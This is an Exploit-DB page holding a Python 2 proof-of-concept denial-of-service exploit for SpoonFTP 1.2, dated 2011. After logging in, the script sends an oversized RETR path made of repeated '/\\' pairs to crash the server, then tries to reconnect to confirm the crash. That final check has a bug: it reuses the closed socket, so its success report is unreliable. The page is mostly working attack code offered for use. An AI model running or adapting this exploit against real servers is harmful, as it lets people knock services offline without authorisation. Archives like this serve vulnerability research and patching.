SpoonFTP 1.2 - RETR Denial of Service Vulnerability



EDB-ID: 17021 CVE: N/A OSVDB-ID: N/A
Author: C4SS!0 G0M3S Published: 2011-03-21 Verified: Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Screenshot
Prev Home Next
#!/usr/bin/python
#
#
#[+]Exploit Title: Exploit Denial of Service SpoonFTP 1.2
#[+]Date: 21\03\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.softpedia.com/progDownload/SpoonFTP-Download-49969.html
#[+]Version: 1.2
#[+]Tested On: WIN-XP SP3 Portuguese Brazil
#[+]CVE: N/A
#
#
#       xxx     xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx
#        xxx   xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx 
#         xxx xxx         xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx                   
#          xxxxx          xxx       xxx      xxx       xxx      xxx       xxx           xxxxxx  
#           xxx           xxx       xxx      xxx       xxx      xxx       xxx          xxxxxxxx  xxxxxxxx  xxxxxxxxx
#         xxxxxx          xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx    xx  xx
#        xxx  xxx         xxx       xxx      xxx       xxx      xxx       xxx          xx    xx  xx xxxx   xx  xxxxx
#      xxx     xxx        xxxxxxxxxxxxx      xxxxxxxxxxxxx      xxxxxxxxxxxxx   xxx    xxxxxxxx  xx   xx   xx     xx
#     xxx       xxx        xxxxxxxxxxx        xxxxxxxxxxx        xxxxxxxxxxx    xxx     xxxxxx   xx    xx  xxxxxxxxx
#
#Criado por C4SS!0 G0M3S
#E-mail Louredo_@hotmail.com
#Site www.exploit-br.org
#
#



from socket import *
import os
import sys
from time import sleep

if os.name == 'nt':
     os.system("cls")
     os.system("color 4f")
else:
     os.system("clear")

	 
def usage():
     print """
	 
          ===================================================
          ===================================================
          ==========Exploit Denial of Service SpoonFTP=======
          ==========Autor C4SS!0 G0M3S=======================
          ==========E-mail Louredo_@hotmail.com==============
          ==========Site www.exploit-br.org==================
          ===================================================
          ===================================================

"""

if len(sys.argv) !=5:
     usage()
     print "\t\t[-]Usage: %s <Host> <Port> <User> <Pass>" % sys.argv[0]
     print "\t\t[-]Exemple: %s 192.168.1.2 21 admin pass" % sys.argv[0]
     sys.exit(0)

host = sys.argv[1]
porta = int(sys.argv[2])
user = sys.argv[3]
pasw = sys.argv[4]

exploit = "/\\" * (6000/3)
usage()
print "\t\t[+]Connecting to Server "+host+"...\n"
sleep(1)
s = socket(AF_INET,SOCK_STREAM)
try:
     s.connect((host,porta))
     print "\t\t[+]Checking if server is vulnerable\n"
     sleep(1)
     banner = s.recv(2000)
     if banner.find("SpoonFTP V1.2") == -1:
          print "\t\t[+]I'm sorry, server is not vulnerable:(\n"
          sleep(1)
          sys.exit(0x00)
     print "\t\t[+]Making Loging On Server\n"
     sleep(1)
     s.send("USER "+user+"\r\n")
     s.recv(200)
     s.send("PASS "+pasw+"\r\n")
     check = s.recv(2000)
     if check.find("230") == -1:
          print "\t\t[+]Error on Login, Check Your Username or Password\n"
          sleep(1)
          sys.exit(0)
     print "\t\t[+]Sending Exploit...\n"
     sleep(1)
     s.send("RETR "+exploit+"\r\n")
     s.close()
     print "\t\t[+]Submitted Exploit Success\n"
     sleep(1)

     print "\t\t[+]Checking if the exploit works\n"
     sleep(1)
     try:
          so = socket(AF_INET,SOCK_STREAM)
          s.connect((host,porta))
          print "\t\t[+]I'm Sorry, But Not Worked Exploit:(\n"
	  sleep(1)
     except:
          print "\t\t[+]Congratulations, worked with the Exploit Success:)\n"
	  sleep(1)
     
     
except:
     print "\t\t[+]Error connecting to Server\n"
     sleep(1)